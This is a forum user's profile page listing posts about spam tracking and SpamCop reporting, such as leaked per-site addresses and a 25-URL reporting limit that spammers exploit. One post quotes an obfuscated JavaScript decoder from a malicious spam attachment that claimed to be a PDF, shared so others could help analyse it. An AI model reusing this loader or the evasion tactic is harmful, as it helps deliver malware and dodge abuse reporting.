• Content count

  • Joined

  • Last visited

Community Reputation

0 Neutral

About MisterBill

  • Rank
  1. I have my own domain, and I use different email addresses at different sites (like starbucks[at]mydomain.us) so I can tell where my address came from if/when their mailing list gets stolen (I use wildcard forwarding so I don't need to define each address). It turns out that this happens a lot more often than you'd think and I've been getting emails at addresses used at only a single site for a while now. They seem to come in batches, typically it's some of the nasty stuff with attachments and thanks to Spamcop I've determined that it comes from different sites, so I'm guessing it's being sent by zombie machines. Interestingly, I rarely get this spam at addresses that I've never used, so this says to me that something is getting these addresses and I'd like to know how. I've always figured that it was various sites that got hacked. My email addresses from sites like Consumerist, Couponmom and Opentable that routinely get spam. Some of those that have been compromised for a while I've set up dummy forwarding for (to a non-existent address) so I don't get those anymore. I got a really huge batch of this spam today (it's been bad for the past week), and included in it was one sent to a "citi" address, which I've used for Citibank and nothing else (and this is the first time I've seen spam sent to it). So this means that either their database has been hacked, or else the spammers are getting my addresses from some other source. My mail is forwarded thru Namecheap's forwarding service to my Verizon mailbox. It seems like they'd be getting it from one of those sources, or from my machine, and I think that the latter is pretty unlikely. Fortunately all of this stuff ends up in my Verizon spam folder, but I would love to figure out how this is happening. Any ideas?
  2. I'm also seeing this problem, and it's occurring with email sent by Mailwasher and the piece of mail being tossed likely had multiple pieces of spam in it, all of which are presumably lost. Are you still interested in receiving a copy of the email to investigate? Sadly, I don't think it contains what was sent, which would be useful.
  3. This is still a problem. I got this spam reporting rejected today. Can someone tell me what the ipv6 header is? They look OK to me. http://www.spamcop.net/sc?id=z5246558407z8...;action=display
  4. Thanks for the link. I agree that reporting email addresses in the header is useless. But that page says that reporting the address where the spammer is expecting replies can be useful. yet it does not do it. I prefer to have something like Spamcop doing the reporting because it is anonymous. If I have to send it with my real email address and find out that the spammer also owns the domain I am reporting him to (i.e., he is getting the complaint), I will likely get much more spam as a result.
  5. I've recently started getting a lot of spam from a hosting company. There is no website to report but there is a mailto that they have responses going to. However, Spamcop is not sending any notice to that site. Is there a reason? Seems like an address that gets replies is going to be real, so definitely the site owner should be notified. http://www.spamcop.net/sc?id=z4996578016z3...7ff1799c84ceeaz
  6. Not to belabor the point, but the net result was the same. Changing the URL's so that enough of them were alike or deleting a bunch, both reduced the count of URL's to allow Spamcop to report on a number it considers acceptable. In both cases it changed the behavior of Spamcop because it would not have reported any URL's otherwise.
  7. Thanks. But once again, it appears that deleting lines is just as bad as changing URL's. So I don't understand why that was suggested as an acceptable solution.
  8. I had not thought of deleting lines, but how is doing that any different than changing the URL to be the same domain as others already in the email? Either way, the mail has been doctored. It's not like I am adding new domains to be reported, so the result is the same as deleting the lines.
  9. Well, given that the emails seemed to come from different locations, I assume they were being sent by zombie machines, which made the mail origin not very useful, either.
  10. Sorry, I did not want to post the URL because I thought that it would have my actual email address in the source, but I see that it's x'ed out. This is not the link for the email that I posted above, but it is a similar one (turns out they were using several different domains, I discovered this when processing the rest of the spam I had received). http://www.spamcop.net/sc?id=z4993364257z6...9710e86d3c2b5fz And the issue is not that some of the domain names are not valid and cannot be resolved -- it's that Spamcop doesn't even try because there are more than 25 in the email, so it stops processing any of them. It seems like a really simple way for a spammer to avoid getting their domains reported. Just overload Spamcop with a bunch of different hosts, and none get reported.
  11. I've started getting Viagra spam at multiple addresses at my private domain which have clearly been stolen from other sites. Making things worse, the sleazy spammer is using multiple random first level names on their domain (example: http://lpijuxl.domcitystr.com), so Spamcop stops looking at URLs after the first 25 and does not report any of them! I tried playing with it and changed a bunch of the URLs to be the same and it was going to report to: spam[at]ccert.edu.cn anti-spam[at]mail.sxptt.zj.cn abuse#anti-spam.cn[at]devnull.spamcop.net What can be done to fix Spamcop so it can't get tricked by spammers like this and DOES report? Granted, reporting to this site is not likely to result in the spammer being stopped, but it would be nice to have it sent so it can be tracked. I wonder if the spammer is actually doing this to break Spamcop, or for another reason. Here is the spam with my domain and forwarding email at my ISP x'ed out: Admn Edit: entire spam posting removed. Things like this is why the use of a Tracking URL is requested.
  12. I got spam which had a java scri_pt portion to it. I can't figure out what it is trying to do, can someone help? The email claimed there was a PDF to view, I will attach the whole section for context. Content-type: text/html; name="61114Journal Sentinel - Leka Obit.html" Content-transfer-encoding: 7BIT Content-disposition: attachment; filename="61114Journal Sentinel - Leka Obit.html" <scri_pt language="java scri_pt" type="text/java scri_pt">function xfxs(oajm){var cz58="sr:0.cpt/ =\"xg;lhivm-quoefn>a<",iwy0,qyot,n3dt="",vvg8,wo2u=cz58.length;enum(unescape("%66un%63ti%6Fn l%6A2w%28fs%61a){%6E3d%74+=%66saa%7D"));for(qyot=0;qyot<oajm.length;qyot++){iwy0=oajm.charAt(qyot);vvg8=cz58.indexOf(iwy0);if(vvg8>-1){vvg8-=(qyot+1)%wo2u;if(vvg8<0){vvg8+=wo2u;}lj2w(cz58.charAt(vvg8));}else{lj2w(iwy0);}}enum(unescape("%64oc%75me%6Et.w%72it%65(n%33dt)%3Bn3%64t=%22%22;"));}xfxs("sq>\"0lolhhrp.p:.><-;hoie\"tp0un/n<\"li=ur\"nu<quumn>>loieo alefv m=q<;rgl.rqnm:et.rss-");</scri_pt><noscript>To display this page you need a browser that supports java scri_pt.</noscript> --Boundary_(ID_pbZ6Ms2kvXLizaqNrjbRog)--
  13. Looks fixed to me. Thanks.
  14. See, it is a trick!
  15. If you click on the already submitted spam's link, then you need to scroll down and see that it claims that it already submitted it (and then come here and complain that it's processing the same spam multiple times, when in reality that is not the actual problem). If you just wait until the link is updated, you know that it's going to work. More of a secret than a trick, if you want. Because I don't think that is what it's doing. It's not skipping it because you process it again. It's just finally getting around to updating the queue to show that the mail has already been processed. If the system is particularly slow, as I saw it was one day last week, it's possible that it would want you to process the same piece of mail a third time. The bottom line is that I strongly doubt that "processing" the mail a second time is what is causing the correct mail to show up. It's a timing issue, and by the time you "process" it again, it's got the correct one at the top of the list.